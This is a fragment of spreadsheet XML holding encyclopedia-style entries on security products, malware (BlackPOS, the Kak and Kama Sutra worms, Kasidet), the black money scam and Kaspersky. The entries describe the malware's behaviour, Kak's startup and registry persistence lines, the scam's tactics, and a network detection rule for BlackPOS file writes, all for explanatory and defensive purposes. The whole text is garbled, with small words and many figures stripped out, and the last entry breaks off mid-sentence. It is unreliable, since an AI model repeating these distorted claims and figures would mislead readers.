    <t>keepsolid unlimited personal virtual private network software available ios, macos, android, windows, linux.vpn unlimited developed keepsolid inc, american company headquarters york city, united states. founded 2013 york, keepsolid provides cybersecurity software internet protection solutions.vpn unlimited servers locations around world operates jurisdiction united states. history keepsolid established 2013 software development company launched unlimited servers.in 2016, unlimited received editor's choice award pcmag.in november 2018, unlimited released lite version freemium apps android ios.in 2019, unlimited added open-source wireguard protocol list available protocols, addition ikev2 openvpn.as 2021, unlimited operates servers locations worldwide. technology unlimited desktop applications windows, macos, linux, mobile apps android. also available extension mozilla firefox, opera, edge, google chrome browsers.vpn unlimited supports protocols ikev2, l2tp, openvpn, pptp, proprietary protocol called keepsolid wise.the technology routes traffic 33434 ports, makes traffic harder detect block. additional features besides general-use servers, provider offers servers specific purposes, including personal servers, sharing, torrenting. some additional features include, kill switch disconnects connection case failure privacy feature like no-log policy.vpn unlimited offers four subscription plans: monthly, yearly, tri-yearly, lifetime. servers keepsolid unlimited maintains servers locations different countries, including australia, austria, belgium, bulgaria, brazil, canada, cyprus, denmark, finland, france, germany, hong kong, iceland, india, ireland, isle man, israel, italy, japan, mexico, netherlands, romania, singapore, south africa, sweden, switzerland, turkey, united kingdom, united states.vpn unlimited provides servers streaming torrents. reception according techradar review 2021: "keepsolid offers excellent performance fair price apps almost everything". techradar admits "relatively servers" admits "excellent wireguard performance" "very fast email support".in 2021, pcworld called useful minimal options" review. other products monodefense: bundle security apps, including full-featured versions unlimited, passwarden, firewall, smartdns. passwarden: password manager keep passwords personal information location, locked master password. smartdns keepsolid: service gives access regionally blocked websites prevents speed drops browsing web. firewall keepsolid: network security solution intercepts resolution known-malicious websites protects devices malware infection. goals keepsolid: online offline tool manage projects, goals, collaborate teams, assign tasks. private browser keepsolid: browser smartphones (both android-based), employs technology encrypt users' traffic. references</t>
  </si>
  <si>
    <t>BlackPOS Malware</t>
  </si>
  <si>
    <t>blackpos interprocess communication hook malware type point-of-sale malware spyware program specifically designed installed point sale (pos) system scrape data debit credit cards. this different normal memory-scraping malware scrapes data needs filters extract target data. this specifically hooks track information, thus called interprocess communication hook. once malware gets installed looks pos.exe file system parses content track track financial card data. encoded data moved second machine smb. blackpos used target corporation data breach 2013. history blackpos program first surfaced early 2013 affected many australian, american, canadian companies, target marcus neiman, incorporated point-of-sale systems companies. virus, also known 'reedum' 'kaptoxa', originally created year-old rinat shabayev later developed 17-year-old sergey taraspov, better known online name, 'ree4'. original version blackpos sold online black market forums taraspov around $2000 became cheaper readily available source code malware leaked onto web. works blackpos infects computers running windows operating systems credit card readers connected part system. system computers easily infected date operating systems antivirus programs prevent security breaches computer database systems weak administration login credentials. blackpos standard memory-scraping malware, exception virus limited pos.exe files infected system. once desired system infected, malware pinpoints process corresponded card reader steals payment card track track data, information stored magnetic strip payment cards, system's memory. once stolen, information cloned onto blank credit cards sold black market used personal reasons. this results consumer personal information compromised usable anyone access information. unlike malware, vskimmer, blackpos offline data extraction method, captured information uploaded remote server online. this makes easier hackers need proximity infected systems retrieve consumer information. furthermore, hackers hide virus detection programming blackpos send stolen information certain time frames. mask traffic information creates normal work hours, making seem nothing suspicious going incidents blackpos used steal customer information businesses worldwide. well-known attack occurred back 2013 mega-store chain, target. target during thanksgiving break november 2013, target's system infected blackpos malware. mid-december mega-store became aware breach security. hackers able target's systems compromising company server uploading blackpos software target's systems. result attack, million customer credit debit card information, million addresses, phone numbers, names, personal information, stolen mainframes. end, 1800 u.s. target stores affected malware attack. neiman marcus target, however, business affected software. neiman marcus, another well-known retailer, affected well. their computer database said infected early july 2013 fully contained january 2014. breach believed involve million credit debit cards span several months. although credit debit card information compromised, neiman marcus issued statement saying social security numbers birthdates affected, among things. companies, ups, wendy's home depot, also claimed affected blackpos well, although reports state breaches caused malware virus. detection there ways detect blackpos activity systems based malware works: identifying transfer encoded track data server message block (smb) recognizing attempted writes fixed drop location transfer encoded track data first strategy detect blackpos uses fact first characters stolen track data always consists digits. result, limited amount combinations produced, means predictable pattern followed. addition, encoding outputs "000" "999" result string always begin: “m1”, “mf”, “mh”, “ml”, “t1”, “tf”, “th”, “tl”, “sh”, “sl”. writes drop location second identify blackpos's network activity dropping file specific location using fixed filename format. example given "security intelligence" checks file path name matches format written: \windows\twain_32\*_*_*_*.txt strategy demonstrated following opensignature rule: alert (msg:"kaptoxa file write detected"; flow:to_server,established; content:"smb|a2|"; content:"\\|00|w|00|i|00|n|00|d|00|o|00|w|00|s|00|\\|00|t|00|w|00|a|00|i|00|n|00|_|00|3|00|2|00|\\"; pcre:"/.*_.*_.*_.*\.|00|t|00|x|00|t/"; sid:1;) prevention according security council, businesses keep malware prevention software updated frequently lower chance infection. addition, system logs regularly checked irregular activity within servers well monitoring large data files sent unknown sources. companies also require login credentials updated regularly provide instructions create safer secure passwords. also point-of-sale malware point sale cyber security standards list cyber attack threat trends cyber electronic warfare malware references</t>
  </si>
  <si>
    <t>Black money scam</t>
  </si>
  <si>
    <t>black money scam, sometimes also known "black dollar scam" "wash wash scam", scam artists attempt fraudulently obtain money victim convincing piles banknote-sized paper real currency stained heist similarly print notes existing blanks scammers have). victim persuaded fees purchase chemicals remove dye, promise share proceeds. black money scam variation known advance fraud. phases initial contact typically scammer send thousands, millions, e-mails known random e-mail addresses, hoping replies. initial message read something like this: lawyer belgium charged seeking rightful heir certain assets deposited many years security company brussels died years ago. made extensive searches find living heirs, minimal success. name named will testament beneficiary assets. believe person entitled writing enquire dead relatives friends named beneficiary assets testament. please names information check indeed beneficiary. amount assets $150,000 large trunk, contents unknown. please reply immediately sometimes however, scammer resorts directly approaching victim. advance fees communications parties continue, become necessary certain fees expenses paid, including government taxes, death duties. reality, taxes paid. however, need fees taxes used excuse make free funds vanish, extract funds victim. false valuation trunk contents eventually various means devices victim persuaded trunk contains large cash, cannot transferred form (bonds, cheques, etc.) reason. addition, bills dyed black color order avoid detection seizure customs officials. victim assured chemical needed removing also trunk. victim already paid money fees taxes, invited shipping expenses trunk home country. whether paid not, trunk shipped sums demanded various pretexts, taxes, security company fees, money transfer fees, legalization fees, export permissions, etc. victim goes "money" when point victim doubts, showing reluctance more, invited inspect contents safety deposit trunk themself. opened contents banknote-sized pieces ordinary black paper shown victim. scammer claim chemical exists remove money. washing small sample black "money" then conman produce small vial washing liquid victim select stained bank note random. this done, conman proceeds wash banknote chemical, performing sleight hand substitutes either already-clean note stained removed chemical. there insufficient liquid wash money, conman "accidentally" spill remaining contents. more funds needed washing chemical fluid victim cannot take away trunk, notes, since informed taxes paid, notes "washed", easy taxes money left over. victim persuaded must chemical wash notes, chemical cleaning fluid "very expensive". once victim parts money fraudster. sometimes fraudsters website purporting seller cleaning fluid, unique unusual name cannot found anywhere else. this adds credibility story victim even contact website directly fluid, allowing conmen another chance victim. alternatively conmen also refer victim specific online advertisement chemical black money. further delays fees fraudsters continue find excuses victim cannot money yet, always promise "last absolutely final step", involves payment another victim. scammers continue make victim sure money, cannot begging borrowing friends banks, victim realizes scammed, gets police involved. fraudsters themselves, victim's money, usually long gone time police involved. reporting crime most frauds reported victims several reasons. first, feel terribly ashamed could naïve. second, many scams involve victim knowingly agreeing receive proceeds crime e.g. informed drug money, evasion money, simply stolen. sometimes scammer persuaded victim incriminate themself, e.g. falsifying document, lying declaration, cetera. victim thus reluctant come forward admit knowingly participating thought criminal scheme. terminology used scam defaced money anti-breeze bank notes black money chemical s.s.d. solution vectrol paste tebi-manetic humine powder solid solution shiba motion decharge sahualla chemicals used ghanaian native caught perpetrating scam revealed tricks trade news chief investigative correspondent brian ross. authentic us$100 bills coated protective layer glue, dipped solution tincture iodine. bill, dried, looks feels like black sugar paper. mass notes real sugar paper; victim picks "note" cleaning, switched iodine coated note. "magic cleaning solution" actually crushed vitamin tablets dissolved water. another arrest, ordinary raspberry drink found "magic cleaning solution". solutions calcium hydroxide magnesium hydroxide also used washing agents scam. show, "better call saul" used scam scam someone brief montage saul's height artist. this could've reference sister series, "breaking bad" chemistry. references external links metropolitan police information fraud london metropolitan police service article businessman conned $742,000. conmen dollar bill hoax arrested gulf news article december 2018. fraudaid cops arrest 'black dollar' victim october 2007</t>
  </si>
  <si>
    <t>KYPS</t>
  </si>
  <si>
    <t>kyps (keep your password secret) free web-based service enables users websites, usually require username/password combination, using one-time passwords. main difference kyps similar password management technologies password never disclosed local computer. this makes kyps effective password theft spyware keyloggers, particularly using public computers internet cafe.more details internal workings kyps published csie 2009 conference. kyps also featured makeuseof, heise.de some internal workings predecessor, open-source project called "impostor", published peer-reviewed globecom conference 2004. also comparison password managers list password managers password manager cryptography references external links entering passwords spyware infected machine using shared-secret proxy (klassp).</t>
  </si>
  <si>
    <t>Kak worm</t>
  </si>
  <si>
    <t>(kagou anti kro$oft) 1999 javascript worm uses outlook express spread itself. behavior first every month, 6:00 worm uses shutdown.exe initiate shutdown show popup text "kagou-anti-kro$oft says today!". minimized window often appears startup title "driver memory error". another message saying driver memory alloc failed!" occasionally pops worm also adds registry hkey_local_machine\software\microsoft\windows\currentversion\run\cag0u edits autoexec.bat make windows launch startup. worm adds commands autoexec.bat: @echo c:\windows\start menu\programs\startup\kak.hta c:\windows\start menu\programs\startup\kak.hta approach works exploiting vulnerability microsoft internet explorer, outlook express uses render html email. vulnerability concerns activex control "scriptlet.typelib" usually used create type libraries (".tlb" files). however, control restrictions content goes type library file file extension have. therefore, control abused create file content extension. since microsoft foresee ability abuse control way, marked "safe scripting" internet explorer's default security settings. this means scripts including control need user's permission order run. embeds abusive code signature email message, code runs email viewed previewed outlook express (because outlook express uses internet explorer provide view/preview functionality html emails). uses "scriptlet.typelib" create file called "kak.hta" startup folder. this file contains code next time machine starts since rendered internet explorer executed using windows scripting host, code placed file even privileges code email signature. next time machine starts "kak.hta" runs, performs number actions setting user's email signature contain code infect systems, worm spread adding lines autoexec.bat delete original "kak.hta" virus difficult track creating "kak.hta" runs startup shut machine midnight first month references external links vbs.kak writeup info pchell.com wscript.kakworm symantec.com js/kak@m mcafee</t>
  </si>
  <si>
    <t>Kama Sutra (computer worm)</t>
  </si>
  <si>
    <t>kama sutra worm, also known blackworm, nyxem, blackmal, type malware (malicious software) infects using microsoft windows. discovered january 2006, kama sutra designed destroy common files microsoft word, excel, powerpoint documents computer's calendar february following month. worm arrived e-mail, enticing computer users promises sexy pictures. subject lines included "school girl fantasies gone bad", "hot movie", "crazy illegal sex!" "kama sutra pics". when users clicked attachment, machine became infected. once executed, worm corrupt overwrite common windows file types, .doc, .pdf, .zip, .xls, among others; data changed become unrecoverable. worm also tries disable antivirus software. also computer worm references marsha walton (february 2006). "new worm relies trick". tech. archived original october 2012. retrieved 2011-02-18. external links cnn:kama sutra worm hits home google accidentally sends kama sutra worm symantec security alert</t>
  </si>
  <si>
    <t>Kasidet POS RAM Scraper Malware</t>
  </si>
  <si>
    <t>kasidet malware variant point sale (pos) malware performs ddos attacks using namecoin's dot-bit service scrape payment card details. also known trojan.mwzlesson neutrino found september 2015 cyber security experts. combination backdoor.neutrino.50 malware. operation kasidet worm gets system along malware gets downloaded unknowingly user visits malicious websites. this malware different malware scrapes data advanced features. first scrapes steals payment card details. then scraped information sent cyber criminal intercepted post requests browser. it's difficult detect using security programs; sometimes detectable email spam campaigns exploit kits. scraping capability kasidet enhanced cyber criminals hides server namecoin service dot-bit. incidents government blamed russian hackers malicious kasidet malware found democratic national committee computers burlington electric company laptop. former case, software allegedly used interfere 2016 election. zscaler reported office documents distributed phishing emails contain macros install kasidet malware user machines. malware believed originate russia. also cyber electronic warfare cyber security standards cyber warfare list cyber attack threat trends proactive cyber defence point-of-sale malware point sale references</t>
  </si>
  <si>
    <t>Bitwarden</t>
  </si>
  <si>
    <t>bitwarden free open-source password management service stores sensitive information website credentials encrypted vault. bitwarden platform offers variety client applications including interface, desktop applications, browser extensions, mobile apps, command-line interface. bitwarden offers cloud-hosted service well ability deploy solution on-premises. history bitwarden debuted august 2016 initial release mobile applications android, browser extensions chrome opera, vault. browser extension firefox later launched february 2017. february 2017, brave browser began including bitwarden extension optional replacement password manager. january 2018, bitwarden browser extension adapted released apple's safari browser safari extensions gallery.in february 2018, bitwarden debuted stand-alone desktop application macos, linux, windows. built variant browser extension delivered electron. windows released alongside bitwarden extension microsoft edge microsoft store month later.in march 2018, bitwarden's vault criticized embedding unconstrained third-party javascript bootstrapcdn, braintree, google, stripe. these embedded scripts could pose attack vector gain unauthorized access bitwarden users' passwords. these third-party scripts removed part bitwarden vault update, released july 2018.in 2018, bitwarden released command-line application enabling users write scripted applications using data bitwarden vaults. june 2018, cliqz performed privacy security review bitwarden firefox browser extension concluded would negatively impact users. following review, bitwarden made available optional password manager cliqz browser.in october 2018, bitwarden completed security assessment, code audit, cryptographic analysis third-party security auditing firm cure53.in june 2020, bitwarden completed another security audit security firm insight risk consulting evaluate security bitwarden network perimeter well penetration testing vulnerability assessments bitwarden services applications. august 2020, bitwarden achieved type certification.in december 2020, bitwarden announced hipaa privacy shield compliant. features open-source codebase biometric unlock cloud synchronization items types logins, secure notes, credit cards, identities end-to-end encryption stored vault data password history, previous passwords login secure sharing vault items bitwarden users autofill login information websites applications username generator password generator password strength testing tool two-factor authentication authenticator apps, email, duo, yubikey, fido file attachments totp storage code generator data breach reports password exposure checks have been pwned? cross-platform client applications self-host bitwarden server on-premises login single sign-on reception january 2021, first password-protection program comparison, u.s. news world report selected bitwarden "best password manager". february, competitor lastpass drop feature free version, cnet recommended bitwarden best free password synchronization across multiple devices, lifehacker recommended "the best password manager people."critics praised features offered software's free version, price premium tier compared managers. product named best "budget pick" wirecutter password manager comparison. bitwarden's secure open source implementation also praised reviewers. however, software criticized lack additional features, reviewers noted basic less intuitive interface compared password managers. also list password managers password manager cryptography references external links official website bitwarden password manager add-ons firefox bitwarden chrome store bitwarden microsoft edge addons bitwarden extension opera add-ons installing bitwarden raspberry using docker</t>
  </si>
  <si>
    <t>Kaspersky Anti-Virus</t>
  </si>
  <si>
    <t>kaspersky anti-virus (russian: антивирус касперского (antivirus kasperskogo); formerly known antiviral toolkit pro; often referred kav) proprietary antivirus program developed kaspersky lab. designed protect users malware primarily designed computers running microsoft windows macos, although version linux available business consumers. product kaspersky anti-virus features include real-time protection, detection removal viruses, trojans, worms, spyware, adware, keyloggers, malicious tools auto-dialers, well detection removal rootkits. microsoft windows users download antivirus rescue disk scans host computer booting inside isolated linux environment. addition, kaspersky anti-virus prevents disabled malware without user permission password access prompts upon disabling protection elements changing internal settings. also scans incoming instant messenger traffic, email traffic, automatically disables links known malware hosting sites using internet explorer firefox, includes free technical support free product upgrades within paid-subscription periods. limits kaspersky anti-virus lacks certain features found kaspersky internet security. these missing features include personal firewall, hips, secure keyboard, antispam, antibanner parental control tools.also, kaspersky, like majority competitors, incompatible many anti-virus anti-spyware software. security vulnerabilities 2005, critical flaws discovered kaspersky anti-virus. could attackers commandeer systems allowed files insert malicious code. days later, software maker offered preliminary protection customers, week later permanent patch made available. operating systems microsoft windows kaspersky initially developed windows, hence system supported client application since beginning. linux edition kaspersky's anti-virus solution linux workstations available business consumers. offers many features included mainstream version windows, including on-access on-demand scanners. specialized editions kaspersky anti-virus also available variety linux servers offer protection forms malware. apple macos (since 2016) newly released macintosh capable edition kaspersky anti-virus compatible (intel processor based) tiger higher include brand version snow leopard, released august 2009. kaspersky internal testing concludes consuming impact performance designed maintain user friendly mac-like interface users familiar. kaspersky anti-virus contains definitions detect block malware affecting windows, linux macos alike. kaspersky anti-virus also scans shared folders users running windows using virtual capable apple macintosh personal computers. system requirements dvd-rom cd-rom drive, internet explorer windows installer also required installation kaspersky anti-virus windows. latest version either downloaded official website purchased retail. awards according av-comparatives, kaspersky anti-virus rates highly amongst virus scanners terms detection rates malware removal, even despite fact program failed virus bulletin tests 2007 another 2008. example, malware removal test done av-comparatives kaspersky antivirus 2013 awarded highest "advanced+" rating able successfully remove malware samples used test following file detection test kaspersky antivirus 2013 also able achieve "advanced+" rating 99.2% sample detection rate. addition, world awarded kaspersky anti-virus highest rank 2007 anti-virus comparative. well-known highly regarded technica lists kaspersky best choices anti-virus windows platform.kaspersky anti-virus "a-listed" journal late 2007, scored highly detection removal malware. attributes combination software’s heuristic scanning uncompromising approach database updates. while many packages check virus signatures daily basis, kaspersky runs hourly schedule, improving chances immunized infection reaches it.” criticisms controversies march 2015, bloomberg accused kaspersky close ties russian military intelligence officials. kaspersky criticized article blog, calling coverage "sensationalist" guilty "exploiting paranoia" "increase readership".in june 2015, united states national security agency united kingdom government communications headquarters agents broke kaspersky antivirus software could people, leaks indicate.on march 2022, german bundesamt sicherheit informationstechnik (bsi) issued warning usage kaspersky antivirus cloud software. antivirus software work requires deep access user's system thus particularly high level trust software, vendor encrypted update channel. certain actions russian military intelligence forces threats issued russia european union, nato federal republic germany part 2022 russian invasion ukraine, usage software considered trustworthy longer would impose serious risk cyber-attack successful. kaspersky responded warning politically motivated, kaspersky’s data processing centers located switzerland, source code available inspection, independently audited. also antivirus software comparison antivirus software comparison firewalls comparison computer viruses kaspersky internet security eugene kaspersky natalya kaspersky references external links official website</t>
  </si>
  <si>
    <t>Kaspersky Internet Security</t>
  </si>
  <si>
    <t>kaspersky internet security (often abbreviated kis) internet security suite developed kaspersky compatible microsoft windows kaspersky internet security offers protection malware, well email spam, phishing hacking attempts, data leaks. kaspersky diagnostics results distributed relevant developers license. windows edition version 2007 (6.0) version first release kis. world magazine praised version 6.0's detection malware. detected percent threats subset january 2006 wild-list, list prevalent threats. suite detected almost (99.57%) percent adware samples. ability scan within compressed packed files, detecting 83.3 percent "hidden" malware. however, version criticized completely removing malware leaving registry entries files. world also highlighted suite's false positives eight 20,000 clean files incorrectly flagged malicious noticeable impact computer performance. however, data cached scan, making subsequent scan faster. firewall blocked attacks inside outside computer tested.the magazine found graphical user interface awkward navigate. features parental controls instant messaging protection, found competing suites symantec mcafee, part version 6.0. both cnet world criticized suite's relatively high retail price, us$79.95. supports windows workstation 4.0, 2000 professional, home edition, professional, professional x64, vista. megabytes free space, internet explorer 5.5, windows installer required. requirements dependent operating system. version 2008 (7.0) version introduced redesigned gui. components renamed reorganized; anti-hacker module renamed firewall, anti-spy module integrated privacy control module. world described interface "intuitive" "great-looking".parental controls introduced, specific settings different categories, "child" "parent". within categories content categories, drugs violence. users manually configure profiles. filtering profiles associated users. since content filtered network level, feature work internet browser. filter relies database known urls analyse websites real-time. attempts access forbidden urls logged, sites visited tracked well, raising privacy issues. limits internet access based time, chat rooms along webmail sites manually blocked.spam filtering integrates microsoft outlook, outlook express, windows mail, bat!. e-mail content analysed scored, e-mail scores specified thresholds either marked "!!spam" "??probably spam". mail dispatcher feature shows subject sender information messages, allows users avoid downloading blatant spam selecting messages download. filter self-trains analyzing incoming outgoing e-mail marked spam, analyzing folders containing spam valid e-mail. senders verified valid e-mail whitelisted. e-mail also whitelisted blacklisted based phrases present text. e-mail non-ascii characters invisible text also blocked. however, version relatively poor showing, misidentifying percent valid messages magazine testing. percent spam also made inbox.protection data leaks incorporated release. suite warns users programs attempt access send data certain areas, internet explorer stores webform information.malware protection mostly positive detection disinfection tests av-test.org. version detected percent wildlist threats. using one-month-old signatures malware, however, detection fell percent. files scanned 5.24 megabytes second. version successfully identified actively running rootkits, four inactive rootkits, able remove rootkits. firewall correctly blocked attempted outside connections, reasonable level security left default settings.this version drops support windows 2000, windows service pack required, except case professional edition. vista supported well. requirements dependent operating system. megabytes free space, internet explorer 5.5, windows installer 2.0. version 2009 (8.0) this version introduces revised user interface, application filtering module, updated anti-virus engine, vulnerability scanner. main window separates settings four categories, compared eight predecessor. status changes colour (green, yellow, red) reflect overall program status flashes divert attention needed. magazine also noted pop-up notifications kept minimum.kaspersky claims core anti-virus engine revised increase scan speed. magazine found initial scan took hours, however subsequent scans took minutes complete. however, malware detection relatively comparison anti-virus applications tested. thousand samples, version detected 95.6 percent. score around percent. using two-week-old signatures, version detected percent viruses different samples. kaspersky also blocked percent malware based solely behaviour. performers scored 55.3 percent percent respectively. version 2009 detected 98.1 percent adware. however, world noted achieve kind performance, users modify program settings. default settings, allowed zango install. block installation, users must enable scan "other malware".the security analyzer looks operating system program patches. also looks vulnerable system settings, presenting users list recommended actions prevent malware gaining access system. however, world criticized amount computer jargon used lack information adjust settings appropriately. hand, magazine found feature straightforward, often solution involved downloading installing update.kis uses whitelist carbon black classify trusted malicious programs. malicious programs allowed all. unknown programs falling categories restricted actions perform. firewall blocked attacks magazine testing. phishing protection introduced release. testing magazine found feature blocked percent phishing urls. internet explorer blocked percent urls, mozilla firefox blocked percent.spam filtering integrates mozilla thunderbird scans nntp traffic. spam automatically diverted folder. when using unsupported e-mail client download pop3, imap nntp mail, kaspersky still generate report messages. however, unsupported client, toolbar program classify messages spam client itself. version 2010 (9.0) version 2010 kaspersky internet security introduced overhauled user interface sandbox running applications virtualized environment. 9.0.0.736 build 2010 fully supported windows operating system. version 2011 (11.0) beta version released windows users june 2010. this version included interface, well gadget available windows vista windows users. rated version "very good" (4/5 stars). firewall noted good, made adequate malware detection rates. critical fixes released kaspersky lab, making current version 11.0.2.556. version 2012 (12.0) march 2011, kaspersky released first build version 2012, came beta version english, french russian version, versions later. june 2011 kaspersky announced commercial release kaspersky internet security 2012 france, germany, switzerland. current version 12.0.0.374. version 2013 (13.0) beta version released windows users march 2012. this version includes interface looks (currently, least) much like internet security 2012. there safe option, proactive defense, instead behavioural monitoring system watcher seems taking greater responsibility detecting malware safe banking feature added. release candidate (build 13.0.1.4088 released windows users july 2012. final version released august 2012 build 13.0.1.4190 version 2014 (14.0) beta testing started march 2013. this version introduced windows like design. final version released august 2013 build 14.0.0.4651 india russia, august august 2014 release frequently characterized inferior user expectations, largely removal range granular fine-tuning options 2013 earlier, used experienced users; number added back 2015 beta time technical release (build 463). february 2014 build 14.0.0.4651(e) released. build 14.0.0.4651(i) latest (current) version. version 2015 (15.0) april 2014, beta version 2015 product, build 463, released, followed technical release preview, near-complete 2015 product. first official release product bangladesh june 2014. version 2017 (17.0) version 2018 (18.0) version 2019 (19.0) version 2020 (20.0) version 2021 (21.0) controversies regarding security march 2015, bloomberg accused kaspersky close ties russian military intelligence officials. kaspersky slammed claims blog, calling coverage "sensationalist" guilty "exploiting paranoia" "increase readership".as result alleged russian involvement 2016 presidential election ongoing investigations, department homeland security officially banned kaspersky internet security united states federal government september, 2017.as december 2017, kaspersky software banned american federal government law. also antivirus software internet security comparison antivirus software comparison firewalls comparison computer viruses eugene kaspersky natalya kaspersky kaspersky anti-virus kaspersky references external links official website</t>
  </si>
  <si>
    <t>Kaspersky Lab</t>
  </si>
  <si>
    <t>kaspersky russian: лаборатория касперского, laboratoriya kasperskogo) russian multinational cybersecurity anti-virus provider headquartered moscow, russia, operated holding company united kingdom. founded 1997 eugene kaspersky, natalya kaspersky, alexey de-monderik; eugene kaspersky currently ceo. kaspersky develops sells antivirus, internet security, password management, endpoint security, cybersecurity products services.kaspersky expanded abroad 2005 2010 grew $704 million annual revenues 2020, 2016, though annual revenues north america u.s. government security concerns. 2016, software million users largest market-share cybersecurity software vendors europe. kaspersky ranks fourth global ranking antivirus vendors revenue. first russian company included rating world's leading software companies, called software (79th list, june 2012). kaspersky ranked endpoint security segment according data 2010. according gartner, kaspersky currently third largest vendor consumer security software worldwide fifth largest vendor enterprise endpoint protection. 2012 kaspersky named "leader" gartner magic quadrant endpoint protection platforms.the kaspersky global research analysis team (great) discovery sophisticated espionage platforms conducted nations, equation group stuxnet worm. various covert government-sponsored cyber-espionage efforts uncovered research. kaspersky also publishes annual global security risks survey. 2014, kaspersky's research hubs analyze 350,000 malware samples day.kaspersky faced controversy allegations engaged russian federal security service (fsb)—ties company actively denied. u.s. department homeland security banned kaspersky products government departments september 2017. october 2017, subsequent reports alleged hackers working russian government stole confidential data home computer american national security agency contractor kaspersky antivirus software. kaspersky denied allegations, reporting software detected equation group malware samples uploaded servers analysis normal course operation. company since announced commitments increased accountability, soliciting independent reviews verification software's source code, announcing would migrate core infrastructure foreign customers russia switzerland. november 2020 kaspersky finished relocating data customers russia switzerland. company also opened multiple transparency centers switzerland, brazil, canada, spain malaysia allow state agencies, government experts regulators review source code. history first version kaspersky lab's antivirus software developed eugene kaspersky 1989 response cascade virus. early versions virus definitions mostly distributed friends family members. kaspersky continued developing software kami, resulting antiviral toolkit (avp) product released 1992. popularized 1994 competitive analysis hamburg university gave software first place.in 1997, eugene kaspersky, wife natalya kaspersky, alexey de-monderik left kami form kaspersky lab, continue developing antivirus product, called avp. product renamed kaspersky anti-virus american company registered trademark us.in 1998, taiwanese student released virus called cih. during first three weeks outbreak, kaspersky lab's software time able remove this increased demand deals antivirus companies japan, finland germany integrate software.according wired, kaspersky's software "advanced time". example, first software monitor viruses isolated quarantine. company's revenue grew percent 1998 2000, percent revenue coming foreign sales. natalya worked broker deals abroad localize software. opened offices poland, holland china. later expanded germany, france, japan. 2000, company employees sales countries. kaspersky opened offices south east asia middle east 2008 south africa 2009. also expanded india, middle east africa 2010. 2009, retail sales kaspersky lab's antivirus products reached almost million copies year.in 2011, general atlantic bought percent share kaspersky $200 million, expectation helping company public. months later, decision made keep firm private kaspersky re-purchased shares general atlantic. this followed numerous executive departures 2011 2014 regarding disputes going public eugene kaspersky's management style.on january 2012, kaspersky officially left business software alliance (bsa) sopa. supported controversial anti-piracy bill, kaspersky support stating, believe measures used contrary modern advances technology needs consumers," show disapproval, announced intent leave december 2011.by 2013, company unaudited $667 million annual revenues. 2014, kaspersky signed distribution deal ingram micro, significantly expanded reseller program.in august 2015, former kaspersky employees alleged company introduced modified files virustotal antivirus database trick software kaspersky competitors triggering false positives virus malware scans. possible motive eugene kaspersky allegedly furious competitors perceived "unfairly" free-riding kaspersky's malware discoveries open-source virustotal database. company denied allegations. personal blog, eugene kaspersky compared accusations unsubstantiated conspiracy theories. reuters followed publishing leaked emails allegedly kaspersky alluding "falsies" "rubbing out" foreign competitors; kaspersky stated emails "may legitimate obtained anonymous sources hidden agenda".in 2016, kaspersky executive ruslan stoyanov arrested russian authorities charges predating work kaspersky. 2019, convicted treason. products services kaspersky develops markets antivirus, internet security, password management, endpoint security, cybersecurity products services. fourth fifth largest endpoint security vendor third largest consumer security software company. sixth largest overall security company. revenues percent russian companies domestically, one-third european organizations one-fourth u.s. organizations. software million users all.kaspersky's consumer software include antivirus, internet security total security products. antivirus software includes malware protection, monitors suspicious program behavior, warns users potentially dangerous websites. internet security software adds privacy features, parental controls, anti-phishing tools. total security adds parental controls, adult website filters, diagnostic tools, password manager application, features. kaspersky's software available macs, pcs, android, ios, windows mobile, blackberry symbian.for businesses company markets kaspersky endpoint security business suite. includes centralized user interface management application called kaspersky security center. cybersecurity software called kaspersky security network. kaspersky administration kitsecurity center manages configuration, installation remote use. business suite also quarantine, reporting, features. software product businesses staff less called kaspersky small office security (ksos). within suite products specifically virtualization security, mobile security, fraud protection among others. kaspersky also develops free tool helps businesses gain access windows devices infected ransomware. threatpost threatpost computer security blog funded kaspersky lab. according eugene kaspersky, editorial independent kaspersky. launched 2009. partnerships kaspersky anti-virus engine also powers products solutions security vendors, check point, bluecoat, juniper networks, microsoft forefront, netintelligence, clearswift, frontbridge, netasq, wedge networks, others. altogether, companies licensing technology kaspersky lab. kaspersky also number partnerships various technology companies. international multilateral partnership against cyber threats datuk mohd noor amin acts chairman, announced appointment harry cheung managing director kaspersky lab, apac goodwill ambassador greater china.kaspersky long term partner scuderia ferrari december 2021, announced partnership extension formula team, also became team’s esports partner. however, march 2022 deal paused joint decision taken companies 2022 russian invasion ukraine. market assessments reception according magazine, kaspersky antivirus competitor bitdefender consistently ranked independent competitive tests. magazine's malware phishing tests similar results praised software's "bonus security tools". under "cons" magazine said took longer expected complete scan. magazine said kaspersky total security product "impressive feature list" praised extra features total security product, like password management, encryption parental controls. magazine said product scored highly tests antivirus, antiphishing features. "so-so" scores anti-malware tests able catch spam.kaspersky's 2013 endpoint security windows product top-ranked enterprise antivirus software competitive test dennis technology labs, followed symantec endpoint protection. av-comparatives awarded kaspersky "product year" 2015, based number high scores gotten throughout year wide range tests. magazine praised software's features, said lacked policy management deployment options. kaspersky's parental controls software reviewed magazine. reviewer said "well-rounded, affordable parental control monitoring". praised software's content filtering, child profiles, social media monitoring features, criticized features available android.the anti-virus software testing group av-comparatives gave windows version kaspersky "advanced+" rating (its highest) february 2008 on-demand detection test (with fourth highest detection rate among products tested). however, retrospective/proactive test 2008, kaspersky received "standard" rating, detecting malware 1-month signatures receiving substantial amount false positives.the firewall included kaspersky internet security "very good" rating matousec's firewall challenge, result 85%. kaspersky anti-virus achieved result anti malware labs rootkit detection test. also achieved detection polymorphic viruses result self-protection test. 2007, kaspersky internet security received award british magazine also place list".kaspersky passed virus bulletin comparative tests since august 2003. 2005, according world magazine, kaspersky anti-virus software provided fastest updates virus security threats industry.in world magazine's march 2010 comparison consumer security suites, kaspersky internet security 2010 scored 4.5/5 stars, rated second overall. december 2011 version av-comparatives' annual reports, kaspersky lab's software achieved highest overall ranking earned comparatives' "product year" award.on february 2012, kaspersky internet security earned "av-test award best repair 2011" award field home user products av-test institute. january 2013, kaspersky endpoint security earned "av-test award best protection 2012" "av-test award best repair 2012" awards field corporate products av-test institute.later 2013, kaspersky earned product year award av-comparatives highest score among enterprise solutions dennis technology labs report.kaspersky also received certification products oesis certification program, verifies applications interoperable third-party technology solutions like products cisco systems, juniper networks, networks, others.in 2022 march kaspersky received cyber immunity registration trademark united states. registration gives kaspersky exclusive right kaspersky cyber immunity identify products. also confirms trademark distinctive features checked specific criteria national government agencies. malware discovery kaspersky lab's global research analysis team (great) established 2008. investigates cybersecurity threats work malware operations. security companies often evaluated ability uncover previously unknown viruses vulnerabilities. kaspersky's reputation investigating cyber-security threats influential gaining sales prestige. beginning around 2010, kaspersky exposed 